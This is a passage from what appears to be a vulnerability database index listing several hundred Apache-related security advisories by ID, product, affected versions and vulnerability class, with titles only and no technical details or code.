12003| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
12004| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
12005| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
12006| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
12007| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
12008| [123197] Apache Sentry up to 2.0.0 privilege escalation
12009| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
12010| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
12011| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
12012| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
12013| [122800] Apache Spark 1.3.0 REST API weak authentication
12014| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
12015| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
12016| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
12017| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
12018| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
12019| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
12020| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
12021| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
12022| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
12023| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
12024| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
12025| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
12026| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
12027| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
12028| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
12029| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
12030| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
12031| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
12032| [121354] Apache CouchDB HTTP API Code Execution
12033| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
12034| [121143] Apache storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
12035| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
12036| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
12037| [120168] Apache CXF weak authentication
12038| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
12039| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
12040| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
12041| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
12042| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
12043| [119306] Apache MXNet Network Interface privilege escalation
12044| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
12045| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
12046| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
12047| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
12048| [118143] Apache NiFi activemq-client Library Deserialization denial of service
12049| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
12050| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
12051| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
12052| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
12053| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
12054| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
12055| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
12056| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
12057| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
12058| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
12059| [117115] Apache Tika up to 1.17 tika-server command injection
12060| [116929] Apache Fineract getReportType Parameter privilege escalation
12061| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
12062| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
12063| [116926] Apache Fineract REST Hand Parameter privilege escalation
12064| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
12065| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
12066| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
12067| [115883] Apache Hive up to 2.3.2 privilege escalation
12068| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
12069| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
12070| [115518] Apache Ignite 2.3 Deserialization privilege escalation
12071| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
12072| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
12073| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
12074| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
12075| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
12076| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
12077| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
12078| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
12079| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
12080| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
12081| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
12082| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
12083| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
12084| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
12085| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
12086| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
12087| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
12088| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
12089| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
12090| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
12091| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
12092| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
12093| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
12094| [113895] Apache Geode up to 1.3.x Code Execution
12095| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
12096| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
12097| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
12098| [113747] Apache Tomcat Servlets privilege escalation
12099| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
12100| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
12101| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
12102| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
12103| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
12104| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12105| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
12106| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12107| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
12108| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
12109| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
12110| [112885] Apache Allura up to 1.8.0 File information disclosure
12111| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
12112| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
12113| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
12114| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
12115| [112625] Apache POI up to 3.16 Loop denial of service
12116| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
12117| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
12118| [112339] Apache NiFi 1.5.0 Header privilege escalation
12119| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
12120| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
12121| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
12122| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
12123| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
12124| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
12125| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
12126| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
12127| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
12128| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
12129| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
12130| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
12131| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
12132| [112114] Oracle 9.1 Apache Log4j privilege escalation
12133| [112113] Oracle 9.1 Apache Log4j privilege escalation
12134| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
12135| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
12136| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
12137| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
12138| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
12139| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
12140| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
12141| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
12142| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
12143| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
12144| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
12145| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
12146| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
12147| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
12148| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
12149| [110701] Apache Fineract Query Parameter sql injection
12150| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
12151| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
12152| [110393] Apple macOS up to 10.13.2 apache information disclosure
12153| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
12154| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
12155| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
12156| [110106] Apache CXF Fediz Spring cross site request forgery
12157| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
12158| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
12159| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
12160| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
12161| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
12162| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
12163| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
12164| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
12165| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
12166| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
12167| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
12168| [108938] Apple macOS up to 10.13.1 apache denial of service
12169| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
12170| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
12171| [108935] Apple macOS up to 10.13.1 apache denial of service
12172| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
12173| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
12174| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
12175| [108931] Apple macOS up to 10.13.1 apache denial of service
12176| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
12177| [108929] Apple macOS up to 10.13.1 apache denial of service
12178| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
12179| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
12180| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
12181| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
12182| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
12183| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
12184| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
12185| [108790] Apache storm 0.9.0.1 Log Viewer directory traversal
12186| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
12187| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
12188| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
12189| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
12190| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
12191| [108782] Apache Xerces2 XML Service denial of service
12192| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
12193| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
12194| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
12195| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
12196| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
12197| [108629] Apache OFBiz up to 10.04.01 privilege escalation
12198| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
12199| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
12200| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
12201| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
12202| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
12203| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
12204| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
12205| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
12206| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
12207| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
12208| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
12209| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
12210| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
12211| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
12212| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
12213| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
12214| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
12215| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12216| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
12217| [108069] Oracle Endeca Information Discovery Integrator 2.4/3.0/3.1/3.2 Apache Commons Collections memory corruption
12218| [108067] Oracle Business Process Management Suite 11.1.1.9.0/12.2.1.1.0 Apache Commons Collections memory corruption
12219| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
12220| [108065] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Commons Collections memory corruption
12221| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
12222| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
12223| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
12224| [108024] Oracle Communications Order and Service Management 7.2.4.x.x/7.3.0.x.x/7.3.1.x.x/7.3.5.x.x Apache Commons Collections memory corruption
12225| [108015] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Commons Collections memory corruption
12226| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
12227| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
12228| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
12229| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
12230| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
12231| [107639] Apache NiFi 1.4.0 XML External Entity
12232| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
12233| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
12234| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
12235| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
12236| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
12237| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
12238| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
12239| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
12240| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
12241| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
12242| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
12243| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12244| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12245| [107197] Apache Xerces Jelly Parser XML File XML External Entity
12246| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
12247| [107084] Apache Struts up to 2.3.19 cross site scripting
12248| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
12249| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
12250| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
12251| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
12252| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
12253| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
12254| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
12255| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
12256| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
12257| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
12258| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
12259| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
12260| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12261| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12262| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
12263| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
12264| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
12265| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
12266| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
12267| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
12268| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
12269| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
12270| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
12271| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
12272| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
12273| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
12274| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
12275| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
12276| [105878] Apache Struts up to 2.3.24.0 privilege escalation
12277| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
12278| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
12279| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
12280| [105643] Apache Pony Mail up to 0.8b weak authentication
12281| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
12282| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
12283| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
12284| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
12285| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
12286| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
12287| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
12288| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
12289| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
12290| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
12291| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
12292| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
12293| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
12294| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
12295| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
12296| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
12297| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
12298| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
12299| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
12300| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
12301| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
12302| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
12303| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
12304| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
12305| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
12306| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
12307| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
12308| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
12309| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
12310| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
12311| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
12312| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
12313| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
12314| [103690] Apache OpenMeetings 1.0.0 sql injection
12315| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
12316| [103688] Apache OpenMeetings 1.0.0 weak encryption
12317| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
12318| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
12319| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
12320| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
12321| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
12322| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
12323| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
12324| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
12325| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
12326| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
12327| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
12328| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
12329| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
12330| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
12331| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
12332| [103352] Apache Solr Node weak authentication
12333| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
12334| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
12335| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
12336| [102697] Apache HTTP Server 2.2.32/2.2.24 HTTP Strict Parsing ap_find_token Request Header memory corruption
12337| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
12338| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
12339| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
12340| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
12341| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
12342| [102536] Apache Ranger up to 0.6 Stored cross site scripting
12343| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
12344| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
12345| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
12346| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
12347| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
12348| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
12349| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
12350| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
